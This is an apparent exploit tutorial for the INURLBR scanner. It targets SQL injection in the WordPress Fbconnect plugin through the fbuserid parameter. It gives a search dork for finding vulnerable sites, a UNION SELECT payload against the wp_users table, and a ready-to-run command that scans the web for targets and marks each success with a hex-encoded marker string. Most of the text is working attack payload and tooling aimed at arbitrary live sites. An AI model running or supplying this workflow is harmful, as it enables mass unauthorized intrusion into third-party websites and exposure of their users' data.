[ + ] EXPLORING: SQLI AND VALIDATING HTML RETURN
[ + ] WORDPRESS: Fbconnect
[ + ] FILE VULN: fbconnect_action=myhome&fbuserid=1
[ + ] EXPLOIT: and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0
exec: fbconnect_action=myhome&fbuserid=1 + xpl
# AUTOR: Cleiton Pinheiro / Nick: googleINURL # Email: [email protected] # Blog: http://blog.inurl.com.br # Twitter: https://twitter.com/googleinurl # Fanpage: https://fb.com/InurlBrasil # Pastebin http://pastebin.com/u/Googleinurl # GIT: https://github.com/googleinurl # PSS: http://packetstormsecurity.com/user/googleinurl # EA: http://www.exploit4arab.net/author/248/Cleiton_Pinheiro # YOUTUBE: http://youtube.com/c/INURLBrasil # PLUS: http://google.com/+INURLBrasil[ + ] SEARCH DORK
--dork 'inurl:"?fbconnect_action="'
---------------------------------------------------------------------------
[ + ] OUTPUT VULN
-s sqli.txt
---------------------------------------------------------------------------
[ + ] ID SEARCH ENGINES 1 = GOOGLE + CSE, 6 GOOGLE API
-q 1,6
---------------------------------------------------------------------------
[ + ] EXPLOIT GET
--exploit-get '/?fbconnect_action=myhome&fbuserid=1 and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0'
---------------------------------------------------------------------------
[ + ] TYPE INTERNAL VALIDATION
-t 2
---------------------------------------------------------------------------
[ + ] SEARCH FOR CUSTOM VALUE
-a 'xpl_success'
---------------------------------------------------------------------------
[ + ] FILTER HOSTS URL / MOD UNIQUE = HOST+XPL_GET
--unique
---------------------------------------------------------------------------
[ + ] CONVERTED VALUE
0x78706c5f73756363657373 = hex(xpl_success)
---------------------------------------------------------------------------
- We pass the value (hexdecimal)-'0x78706c5f73756363657373' in our sql injection.
Se a string 'xpl_success' aparecer no retorno html do nosso alvo, Significa que foi explorado com sucesso.
If the string 'xpl_success' appears on the html return of our target, it means that was successfully exploited.
Resumindo eu passo um valor pré-definido na minha injeção sql em formato hexdecimal no select ,caso tal valor retorne no formato string significa que foi executado com sucesso.
No tutorial converti a string xpl_success para hexadecimal que fica 78706c5f73756363657373, injeto no server ele executa e prita pro cliente.
No script INURLBR o parâmetro -t level 2 é pra ser validado com uma busca personalizada dentro do alvo, quando quero achar uma determinada string por isso usamos o comando -a complementando, -t 2 anula a busca de outros erros SQLI e vai focar somente em nossa string passada através -a 'sua_string'.
if(HTML == xpl_success){ OK }
[ + ] COMMAND:
php inurlbrpriv8.php --dork 'inurl:"?fbconnect_action="' -s sqli.txt -q 1,6 --exploit-get '/?fbconnect_action=myhome&fbuserid=1 and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0' -t 2 -a 'xpl_success' --unique
[ + ] VÍDEO:
DOWNLOAD SCANNER:
https://github.com/googleinurl/SCANNER-INURLBR
REF
http://blog.inurl.com.br/2013/09/exploit-wordpress-fbconnectaction-pei.html
http://www.1337day.com/exploit/15790